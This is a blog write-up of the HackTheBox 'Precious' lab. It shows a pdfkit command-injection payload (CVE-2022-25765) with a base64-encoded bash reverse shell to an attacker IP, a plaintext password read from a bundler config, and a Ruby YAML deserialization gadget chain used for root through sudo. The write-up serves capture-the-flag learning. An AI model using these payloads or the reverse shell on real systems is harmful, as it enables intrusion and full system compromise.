<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Precious - HackTheBox | Nehal Zaman</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="Precious - HackTheBox" />
<meta name="author" content="Nehal Zaman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A perpetual learner. CTF player. Programmer." />
<meta property="og:description" content="A perpetual learner. CTF player. Programmer." />
<link rel="canonical" href="http://localhost:4000/posts/precious_htb.html" />
<meta property="og:url" content="http://localhost:4000/posts/precious_htb.html" />
<meta property="og:site_name" content="Nehal Zaman" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-12-23T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Precious - HackTheBox" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Nehal Zaman"},"dateModified":"2022-12-23T00:00:00-05:00","datePublished":"2022-12-23T00:00:00-05:00","description":"A perpetual learner. CTF player. Programmer.","headline":"Precious - HackTheBox","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/precious_htb.html"},"url":"http://localhost:4000/posts/precious_htb.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Nehal Zaman</h1>
        </a>
        <h2>A perpetual learner. CTF player. Programmer.</h2>

        <section id="downloads">
          
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>23 December 2022</small>
<h1>Precious - HackTheBox</h1>

<p class="view">by Nehal Zaman</p>

<p><img src="/assets/images/writeups/precious/banner.png" alt="" /></p>

<h1 id="introduction">INTRODUCTION</h1>

<p><strong>Precious</strong> is an easy linux based box on <strong>HackTheBox</strong>, created by <a href="https://www.hackthebox.com/home/users/profile/27582">Nauten</a>.</p>

<p>Foothold on the box is obtained through a CVE that leads to <strong>Remote Code Execution (RCE)</strong>.</p>

<p>Then a hardcoded secret gets us a low privileged <strong>user</strong>.</p>

<p>Finally the <strong>root</strong> on the box is obtained by a <strong>insecure deserialization</strong> vulnerability in a ruby library.</p>

<h1 id="scanning">SCANNING</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span>rustscan <span class="nt">-a</span> 10.10.11.189 <span class="nt">-r</span> 1-65535 <span class="nt">--ulimit</span> 5000                           
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| <span class="o">{}</span>  <span class="o">}</span>| <span class="o">{</span> <span class="o">}</span> |<span class="o">{</span> <span class="o">{</span>__ <span class="o">{</span>_   _<span class="o">}{</span> <span class="o">{</span>__  /  ___<span class="o">}</span> / <span class="o">{}</span> <span class="se">\ </span>|  <span class="sb">`</span>| |
| .-. <span class="se">\|</span> <span class="o">{</span>_<span class="o">}</span> |.-._<span class="o">}</span> <span class="o">}</span> | |  .-._<span class="o">}</span> <span class="o">}</span><span class="se">\ </span>    <span class="o">}</span>/  /<span class="se">\ </span> <span class="se">\|</span> |<span class="se">\ </span> |
<span class="sb">`</span>-<span class="s1">' `-'</span><span class="sb">`</span><span class="nt">-----</span><span class="s1">'`----'</span>  <span class="sb">`</span>-<span class="s1">'  `----'</span>  <span class="sb">`</span><span class="nt">---</span><span class="s1">' `-'</span>  <span class="sb">`</span>-<span class="s1">'`-'</span> <span class="sb">`</span>-<span class="s1">'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/n3hal/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.189:22
Open 10.10.11.189:80
[~] Starting Script(s)
[&gt;] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-23 03:15 EST
Initiating Ping Scan at 03:15
Scanning 10.10.11.189 [2 ports]
Completed Ping Scan at 03:15, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:15
Completed Parallel DNS resolution of 1 host. at 03:15, 5.56s elapsed
DNS resolution of 1 IPs took 5.56s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 03:15
Scanning 10.10.11.189 [2 ports]
Discovered open port 80/tcp on 10.10.11.189
Discovered open port 22/tcp on 10.10.11.189
Completed Connect Scan at 03:15, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.189
Host is up, received syn-ack (0.24s latency).
Scanned at 2022-12-23 03:15:35 EST for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.14 seconds

</span></code></pre></div></div>

<p>There are 2 ports open: <strong>22</strong> and <strong>80</strong>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p</span> 22,80 <span class="nt">-n</span> 10.10.11.189
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-12-23 03:17 EST
Nmap scan report <span class="k">for </span>10.10.11.189
Host is up <span class="o">(</span>0.24s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 <span class="o">(</span>RSA<span class="o">)</span>
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>15.52 seconds

</code></pre></div></div>

<p>Obviously, <strong>SSH</strong> is running on port 22 and <strong>HTTP</strong> web service on port 80.</p>

<p>Also, we get to know about a domain name <code class="language-plaintext highlighter-rouge">precious.htb</code>. We need to add this in our <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p</span> 80 <span class="nt">-n</span> precious.htb
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-12-23 03:20 EST
Nmap scan report <span class="k">for </span>precious.htb <span class="o">(</span>10.10.11.189<span class="o">)</span>
Host is up <span class="o">(</span>0.24s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0
| http-server-header: 
|   nginx/1.18.0
|_  nginx/1.18.0 + Phusion Passenger<span class="o">(</span>R<span class="o">)</span> 6.0.15
|_http-title: Convert Web Page to PDF

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>12.82 seconds

</code></pre></div></div>

<p>The web server is running on <code class="language-plaintext highlighter-rouge">nginx/1.18.0</code>.</p>

<p>Looking at the <code class="language-plaintext highlighter-rouge">http-title</code> (<code class="language-plaintext highlighter-rouge">Convert Web Page to PDF</code>), one can assume that the website is about a service that converts a web page to a pdf.</p>

<h1 id="enumerating-web">ENUMERATING WEB</h1>

<p><img src="/assets/images/writeups/precious/1.png" alt="" /></p>

<p>We can provide a URL, and this service probably snaps it into pdf.</p>

<p><img src="/assets/images/writeups/precious/2.png" alt="" /></p>

<p>When <code class="language-plaintext highlighter-rouge">https://google.com</code> is given as input, we can see the error message <code class="language-plaintext highlighter-rouge">Cannot load remote URL!</code>.</p>

<p>This is probably due to the fact that the box is not connected to the internet, and hence can not make request to the given URL.</p>

<p>This can be vulnerable to SSRF. Let us first see how should a correct output look like.</p>

<p>I am creating python <code class="language-plaintext highlighter-rouge">http.server</code> for this.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'&lt;h1&gt;Testing by Cur1osity&lt;/h1&gt;'</span> <span class="o">&gt;</span> index.html        
                                                                                                                                                                                                       
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span>python <span class="nt">-m</span> http.server 80                                             
Serving HTTP on 0.0.0.0 port 80 <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ...


</code></pre></div></div>

<p><img src="/assets/images/writeups/precious/3.png" alt="" /></p>

<p>When we give <code class="language-plaintext highlighter-rouge">http://&lt;attacker ip&gt;/index.html</code>, a pdf is sent back with our html page converted to pdf as contents.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span>exiftool ix1e6gpx3zrpxc7ra10ohxc1jlhsc91b.pdf 
ExifTool Version Number         : 12.44
File Name                       : ix1e6gpx3zrpxc7ra10ohxc1jlhsc91b.pdf
Directory                       : <span class="nb">.</span>
File Size                       : 11 kB
File Modification Date/Time     : 2022:12:23 03:39:46-05:00
File Access Date/Time           : 2022:12:23 03:39:46-05:00
File Inode Change Date/Time     : 2022:12:23 03:39:46-05:00
File Permissions                : <span class="nt">-rw-r--r--</span>
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6
                                                            
</code></pre></div></div>

<p>The metadata of the PDF reveals the utility used to create it: <code class="language-plaintext highlighter-rouge">pdfkit v0.8.6</code>.</p>

<p>There is a RCE issue specific to that version of utility, having CVE id: <code class="language-plaintext highlighter-rouge">CVE-2022-25765</code>.</p>

<p>If <code class="language-plaintext highlighter-rouge">pdfkit</code> tries to render a URL that is controlled by user, it can potentially lead to RCE.</p>

<p>If the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF.</p>

<p>Learn more about it <a href="https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795">here</a>.</p>

<p><strong>PAYLOAD</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
http://[attacker ip]/index.html?name=#{'%20`ping -c 4 [attacker ip]`'}

</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span><span class="nb">sudo </span>tcpdump <span class="nt">-i</span> tun0 icmp
tcpdump: verbose output suppressed, use <span class="nt">-v</span><span class="o">[</span>v]... <span class="k">for </span>full protocol decode
listening on tun0, link-type RAW <span class="o">(</span>Raw IP<span class="o">)</span>, snapshot length 262144 bytes
03:52:10.333065 IP 10.10.14.1 <span class="o">&gt;</span> 10.10.X.X: ICMP host precious.htb unreachable, length 68
03:52:10.333086 IP 10.10.14.1 <span class="o">&gt;</span> 10.10.X.X: ICMP host precious.htb unreachable, length 68
03:52:10.333095 IP 10.10.14.1 <span class="o">&gt;</span> 10.10.X.X: ICMP host precious.htb unreachable, length 68
03:52:10.333100 IP 10.10.14.1 <span class="o">&gt;</span> 10.10.X.X: ICMP host precious.htb unreachable, length 68
03:52:10.333107 IP 10.10.14.1 <span class="o">&gt;</span> 10.10.X.X: ICMP host precious.htb unreachable, length 68
03:52:13.630245 IP 10.10.14.1 <span class="o">&gt;</span> 10.10.X.X: ICMP host precious.htb unreachable, length 68

</code></pre></div></div>

<p>We can see the pings on our box. The blind RCE is hence confirmed.</p>

<h1 id="shell-as-ruby">SHELL AS RUBY</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'bash -i &gt;&amp; /dev/tcp/10.10.X.X/443 0&gt;&amp;1'</span> | <span class="nb">base64 
</span>YmFzaCAtaSA+JiAv..........SNIP...........y80NDMgMD4mMQo<span class="o">=</span>

</code></pre></div></div>

<p>The reverse shell payload is base64 encoded so the dangerous characters does not cause a problem.</p>

<p><strong>FINAL PAYLOAD</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
http://10.10.X.X/?name=#{'%20`echo YmFzaCAtaSA+JiAv..........SNIP...........y80NDMgMD4mMQo= | base64 -d | bash`'}

</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~/Documents/hackthebox/precious]
└─<span class="nv">$ </span>nc <span class="nt">-nlp</span> 443
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>678<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
ruby@precious:/var/www/pdfapp<span class="err">$</span>

</code></pre></div></div>

<p>We got shell as user <code class="language-plaintext highlighter-rouge">ruby</code>.</p>

<h1 id="shell-as-henry">SHELL AS HENRY</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
ruby@precious:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 24
drwxr-xr-x 3 ruby ruby 4096 Oct 26 08:28 <span class="nb">.</span>
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root root    9 Oct 26 07:53 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span> 1 ruby ruby  220 Mar 27  2022 .bash_logout
<span class="nt">-rw-r--r--</span> 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26 08:28 .bundle
<span class="nt">-rw-r--r--</span> 1 ruby ruby  807 Mar 27  2022 .profile
ruby@precious:~<span class="nv">$ </span>
ruby@precious:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> .bundle/
total 12
dr-xr-xr-x 2 root ruby 4096 Oct 26 08:28 <span class="nb">.</span>
drwxr-xr-x 3 ruby ruby 4096 Oct 26 08:28 ..
<span class="nt">-r-xr-xr-x</span> 1 root ruby   62 Sep 26 05:04 config
ruby@precious:~<span class="nv">$ </span>
ruby@precious:~<span class="nv">$ </span><span class="nb">cat</span> .bundle/config 
<span class="nt">---</span>
BUNDLE_HTTPS://RUBYGEMS__ORG/: <span class="s2">"henry:Q3c1AqGHtoI0aXAYFH"</span>

</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">/home/ruby/.bundle/config</code> file reveals the credentials for another user <code class="language-plaintext highlighter-rouge">henry</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
ruby@precious:~<span class="nv">$ </span>su - henry
Password: 
henry@precious:~<span class="nv">$ </span>
henry@precious:~<span class="nv">$ </span><span class="nb">id</span><span class="p">;</span> <span class="nb">whoami
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>henry<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>henry<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>henry<span class="o">)</span>
henry

</code></pre></div></div>

<h1 id="privilege-escalation">PRIVILEGE ESCALATION</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
henry@precious:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>henry on precious:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin

User henry may run the following commands on precious:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

</code></pre></div></div>

<p>User <code class="language-plaintext highlighter-rouge">henry</code> can run the ruby script <code class="language-plaintext highlighter-rouge">/opt/update_dependencies.rb</code> as <code class="language-plaintext highlighter-rouge">root</code> without any password.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
henry@precious:/opt<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-al</span>
total 16
drwxr-xr-x  3 root root 4096 Oct 26 08:28 <span class="nb">.</span>
drwxr-xr-x 18 root root 4096 Nov 21 15:11 ..
drwxr-xr-x  2 root root 4096 Oct 26 08:28 sample
<span class="nt">-rwxr-xr-x</span>  1 root root  848 Sep 25 11:02 update_dependencies.rb
henry@precious:/opt<span class="nv">$ </span><span class="nb">cat </span>update_dependencies.rb 
<span class="c"># Compare installed dependencies with those specified in "dependencies.yml"</span>
require <span class="s2">"yaml"</span>
require <span class="s1">'rubygems'</span>

<span class="c"># TODO: update versions automatically</span>
def update_gems<span class="o">()</span>
end

def list_from_file
    YAML.load<span class="o">(</span>File.read<span class="o">(</span><span class="s2">"dependencies.yml"</span><span class="o">))</span>
end

def list_local_gems
    Gem::Specification.sort_by<span class="o">{</span> |g| <span class="o">[</span>g.name.downcase, g.version] <span class="o">}</span>.map<span class="o">{</span>|g| <span class="o">[</span>g.name, g.version.to_s]<span class="o">}</span>
end

gems_file <span class="o">=</span> list_from_file
gems_local <span class="o">=</span> list_local_gems

gems_file.each <span class="k">do</span> |file_name, file_version|
    gems_local.each <span class="k">do</span> |local_name, local_version|
        <span class="k">if</span><span class="o">(</span>file_name <span class="o">==</span> local_name<span class="o">)</span>
            <span class="k">if</span><span class="o">(</span>file_version <span class="o">!=</span> local_version<span class="o">)</span>
                puts <span class="s2">"Installed version differs from the one specified in file: "</span> + local_name
            <span class="k">else
                </span>puts <span class="s2">"Installed version is equals to the one specified in file: "</span> + local_name
            end
        end
    end
end
henry@precious:/opt<span class="nv">$ </span><span class="nb">cat </span>sample/dependencies.yml 
yaml: 0.1.1
pdfkit: 0.8.6

</code></pre></div></div>

<p>The script file is not writable.</p>

<p>The script is reading names of gems and the versions from a YAML file. Then it compares the versions with the installed gem version, and prints something to the screen based on that. It is not even installing the dependency.</p>

<p>One thing worth noting here is that the file <code class="language-plaintext highlighter-rouge">dependencies.yml</code> does not have absolute path, meaning that we can control this <code class="language-plaintext highlighter-rouge">yml</code> file from any arbitrary directory we have access to.</p>

<p>The <code class="language-plaintext highlighter-rouge">yml</code> file is called on the <code class="language-plaintext highlighter-rouge">YAML.load()</code>.</p>

<p>The <code class="language-plaintext highlighter-rouge">YAML.load()</code> function is vulnerable to insecure deserialization vulnerability which leads to RCE.</p>

<p>Read more about it <a href="https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/">here</a>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
henry@precious:/dev/shm/cur1osity<span class="nv">$ </span><span class="nb">cat </span>dependencies.yml 
<span class="nt">---</span>
- <span class="o">!</span>ruby/object:Gem::Installer
    i: x
- <span class="o">!</span>ruby/object:Gem::SpecFetcher
    i: y
- <span class="o">!</span>ruby/object:Gem::Requirement
  requirements:
    <span class="o">!</span>ruby/object:Gem::Package::TarReader
    io: &amp;1 <span class="o">!</span>ruby/object:Net::BufferedIO
      io: &amp;1 <span class="o">!</span>ruby/object:Gem::Package::TarReader::Entry
         <span class="nb">read</span>: 0
         header: <span class="s2">"abc"</span>
      debug_output: &amp;1 <span class="o">!</span>ruby/object:Net::WriteAdapter
         socket: &amp;1 <span class="o">!</span>ruby/object:Gem::RequestSet
             sets: <span class="o">!</span>ruby/object:Net::WriteAdapter
                 socket: <span class="o">!</span>ruby/module <span class="s1">'Kernel'</span>
                 method_id: :system
             git_set: /bin/bash
         method_id: :resolve
henry@precious:/dev/shm/cur1osity<span class="nv">$ </span>
henry@precious:/dev/shm/cur1osity<span class="nv">$ </span><span class="nb">sudo </span>ruby /opt/update_dependencies.rb 
sh: 1: reading: not found
root@precious:/dev/shm/cur1osity# 
root@precious:/dev/shm/cur1osity# <span class="nb">id</span><span class="p">;</span> <span class="nb">whoami
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root
root@precious:/dev/shm/cur1osity# <span class="nb">hostname
</span>precious
root@precious:/dev/shm/cur1osity# <span class="nb">date
</span>Fri 23 Dec 2022 04:30:42 AM EST
root@precious:/dev/shm/cur1osity# 

</code></pre></div></div>

<p>When we ran the script as root, the value of <code class="language-plaintext highlighter-rouge">git_set</code> is called as bash command and we got root.</p>

<p>This is all in this box.</p>

<p>Thanks for reading this far.</p>

<p>Hope you liked it.</p>




  <small>tags: <em>os command injection</em> - <em>insecure deserialization</em> - <em>yaml</em> - <em>ruby</em></small>


      </section>
    </div>
  </body>
</html>
